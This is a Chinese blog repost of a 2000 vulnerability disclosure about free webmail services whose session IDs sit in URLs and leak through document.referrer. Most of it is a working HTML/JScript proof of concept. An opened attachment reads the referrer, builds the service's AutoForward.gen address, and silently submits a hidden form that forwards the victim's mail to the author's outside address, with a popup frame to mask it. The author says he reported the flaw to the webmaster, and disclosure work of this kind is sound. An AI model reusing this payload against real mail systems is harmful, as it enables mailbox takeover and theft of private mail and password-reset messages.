CSDN专家博客精华版

为人民服务!
  首页  :: 新随笔  :: 管理

《目前国内一些免费email存在的一个安全漏洞》

Posted on 2007-12-17 11:24  csdnexpert  阅读(129)  评论(0编辑  收藏  举报

 
    该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...
 
  看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
最好不要随便打开别人发给你的HTML文件...
  我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
  该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
  (该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
  不知道了。)
                                          -----学别人一句"转载请注明出处"~ ---
 
                                  shell(shelltools@21cn.com) http://shelltools.yeah.net
                                                      2000/6/14       


〈HTML〉
〈HEAD〉
〈TITLE〉小心用Web方式收信〈/TITLE〉

〈/HEAD〉

〈BODY〉   
      网管,你好:
          ****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
      WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
      中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
      的Script。这个问题在国内的几个免费email中都存在。〈br〉
   
      (如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
            应该被设为"ShellTools@21cn.com"了)
     
                                              ****用户  shell
                                                                   
     
      〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
      〈input type=hidden name=SuUser value=〉
      〈input type=hidden name=Request value=EditDone 〉
      〈input type=hidden  name="B1"  value=" 更新 "〉
      〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
      〈/form〉
      〈SCRIPT Language=JScript〉 
      var sr=document.referrer;
      var isr;
      sr=sr.substring(7,30);
      isr=sr.indexOf("/");
      sr="http://" + sr.substring(0,isr) + "/Banner.htm";
      var sr2=document.referrer;
      isr=sr2.indexOf("ReadMiscPart");
      if ( isr 〉 20 ){
aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no"); 
      aw.document.write('〈HTML〉'); 
      aw.document.write('〈HEAD〉');
        aw.document.write('〈title〉设置自动转发〈/title〉');
        aw.document.write('〈/head〉');
      aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
      aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
      aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
      aw.document.write('〈noframes〉');
      aw.document.write('〈body〉');
      aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
      aw.document.write('〈/body〉');
      aw.document.write('〈/noframes〉');
      aw.document.write('〈/frameset〉');
        aw.document.write('〈/html〉 ');
      sr2 = sr2.substring(0,isr);   
      document.AddUserForm.action= sr2 + "AutoForward.gen";
      document.AddUserForm.submit();}
      window.focus(); 
      〈/SCRIPT〉
   
〈/BODY〉
〈/HTML〉



Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=3105